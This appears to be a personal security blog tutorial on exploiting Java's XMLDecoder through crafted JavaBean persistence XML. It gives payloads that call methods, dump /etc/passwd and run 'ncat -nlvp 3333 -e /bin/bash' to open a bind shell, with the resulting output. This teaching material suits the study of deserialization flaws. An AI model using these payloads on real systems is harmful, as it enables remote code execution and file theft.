Skip to main content

Exploiting XMLDecoder's readObject() in ret2lib style by abusing JavaBean Persistence in XML.

This type of research is not new, it is rather old and I found few reference about it( check reference section). I thought it would be useful to add little more explanation and details about this type of attack as it is very less documented and I had spent a considerable amount of time on writing the various type of exploits other than those which I found online. 

Exploiting this feature is relatively easy but tricker as you need to be creative in writing the exploit in XML style. You can stop here for a moment and have a closer look at the Javabean Persistence XML Scheme and how we can reconstruct object or call a function using the XML Scheme.

https://www.oracle.com/technical-resources/articles/java/persistence3.html

Now why did I mention ret2lib style. In some binary exploitation challenges we try to jump to the destination functions of our interest by redirecting to the function. Sometimes using the system()   and passing some arguments in our exploit, we can run some system commands.  Similarly our attack vectors will be based on using existing functions of the Class which is being currently invoked or some other functions of another Class in a different package. 

So here is the code under attack.

If we execute the code , this is the output generated in beaninxml.xml

<?xml version="1.0" encoding="UTF-8"?>

<java version="1.8.0_265" class="java.beans.XMLDecoder">

 <object class="MyBean"/>

</java>


Now with the knowledge we received from reviewing the Javabeans Persistence XML Scheme, we will construct our payloads based on the above structure which will act as a template for our attack vectors.

Case 1: Calling a member function of a Class

We will try to call the function display1() which is in the MyBean Class. In our attacker controlled xml file ( exploit-base.txt ),we will try to add this code and execute. 

<?xml version="1.0" encoding="UTF-8"?>

<java version="1.8.0_265" class="java.beans.XMLDecoder">

<object class="MyBean">

<void method="display1" />

</object>

</java>


Output 

I am a simple print statement 
MyBean@5451c3a8

Case 2: Calling a member function of a Class having primitive type arguments

In this example we will try to call display2(String argument) which is in the MyBean Class. In our attacker controlled xml file ( exploit-base.txt ),we will try to add this code and execute. Here we are trying to pass an argument of type string to the function.

<?xml version="1.0" encoding="UTF-8"?>

<java version="1.8.0_265" class="java.beans.XMLDecoder">

<object class="MyBean">

<void method="display2">

<string>I am passed via argument</string>

</void>

</object>

</java>


Output

I am passed via argument
MyBean@5451c3a8

Case 3: Calling a member function of a Class having reference type arguments

In this example we will try to call the readFile(File fileName) in MyBean. In our attacker controlled xml file ( exploit-base.txt ),we will try to add this code and execute.Here we are trying to abuse the  readFile(File fileName) function to dump contents of /etc/passwd file. We need to pass a File type object to the function.

<?xml version="1.0" encoding="UTF-8"?>

<java version="1.8.0_265" class="java.beans.XMLDecoder">

<object class="MyBean">

<void method="readFile">

<object class="java.io.File">

  <string>/etc/passwd</string>

  </object>

</void>

</object>

</java>

Output

<snip>
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
</snip>

Case 4: Calling a function of different package

In this example we will try to call java.lang.Runtime.getRuntime().exec(String cmd). In our attacker controlled xml file ( exploit-base.txt ),we will try to add this code and execute.Here we will try to get a bind shell on the victim's machine. Please note we are not using the existing object types base xml scheme. The attack will still be successful even if you encounter the error message. This is because the error pops up when the type conversion happens and the exploit is triggered before that.

<?xml version="1.0" encoding="UTF-8" ?>

<java version="1.4.0" class="java.beans.XMLDecoder">

  <object class="java.lang.Runtime" method="getRuntime">

  <void method="exec">

          <string>ncat -nlvp 3333 -e /bin/bash</string>

        </void>

  </object>

</java>


Output

Exception in thread "main" java.lang.ClassCastException: java.lang.Runtime cannot be cast to MyBean

at DemoExample.fromXML(DemoExample.java:37)

at DemoExample.main(DemoExample.java:12)


Then we go to command prompt and type

nc 127.0.0.1 3333

id

uid=1000(websec) gid=1000(websec)  ... ... ...


Well that's it , I had learnt lot of things while doing this and I hope this will be useful to someone someday :)


References:
  • https://web.archive.org/web/20131016234737/http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html
  • https://stackoverflow.com/questions/14307442/is-it-safe-to-use-xmldecoder-to-read-document-files
  • https://github.com/o2platform/DefCon_RESTing/tree/c77474f2d063973c265f5b265af63fd3c5de44cc/Demos/XMLDecoderVuln/src/com/company
  • https://github.com/pwntester/XMLDecoder

Popular posts from this blog

KringleCon : Sans Holiday Hack 2018 Writeup

SANS HOLIDAY HACK 2018 Writeup , KRINGLECON The objectives  Orientation Challenge  Directory Browsing  de Bruijn Sequences  Data Repo Analysis  AD Privilege Discovery  Badge Manipulation  HR Incident Response  Network Traffic Forensics  Ransomware Recovery  Who Is Behind It All? First I go to Bushy Evergreen and try to solve the terminal challenge . Solving it is fairly easy , Escape_Key followed by  ":q" without quotes After this we move to the kiosk and solve the questions The question were based on the themes of previous Holiday Hack Challenges. Once we answer it correctly we get the flag. For this I visited Minty Candycane and I tried to solve the terminal challenge.  The application has command injection vulnerability , so injecting a system command with the server ip allows execution of the command. So first I perform an `ls` operation to list of the directory contents , followed by a cat of t
Read more

Linux Privilege Escalation : SUID Binaries

After my OSCP Lab days are over I decided to do a little research and learn more on Privilege Escalation as it is my weak area.So over some series of blog post I am going to share with you some information of what I have learnt so far. The methods mentioned over here are not my own. This is something what I have learnt by reading articles, blogs and solving CTFs SUID - Set User ID The binaries which has suid enabled, runs with elevated privileges. Suppose you are logged in as non root user, but this suid bit enabled binaries can run with root privileges. How does a SUID Bit enable binary looks like ? -r- s r-x---  1 hack-me-bak-cracked hack-me-bak         7160 Aug 11  2015 bak How to find all the SUID enabled binaries ? hack-me-bak2@challenge02:~$ find / -perm -u=s 2>/dev/null /bin/su /bin/fusermount /bin/umount /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/gpasswd /usr/bin/newgrp /usr/bin
Read more

Bluetooth Low Energy : Build, Recon,Enumerate and Attack !

Introduction In this post I will try to share some information on bluetooth low energy protocol. Bluetooth Low Energy ( BLE ) is Bluetooth 4.0.It has been widely used in creating "smart" devices like bulbs that can be controlled by mobile apps, or electrical switches that can be controlled by mobile apps. The terms Low Energy refers to multiple distinctive features that is operating on low power and lower data transfer. Code BLE Internals and Working The next thing what we need to know is a profile. Now every bluetooth device can be categorized based on certain specification which makes it easy. Here we will take a close look into two profiles of Bluetooth which is specifically designed for BLE. Generic Access Profile (GAP) - This profiles describes how two BLE devices defines discovery and establishment of connection with each other. There are two types of data payload that can be used. The Advertising Data Payload and Scan Response Payload . The GAP uses br
Read more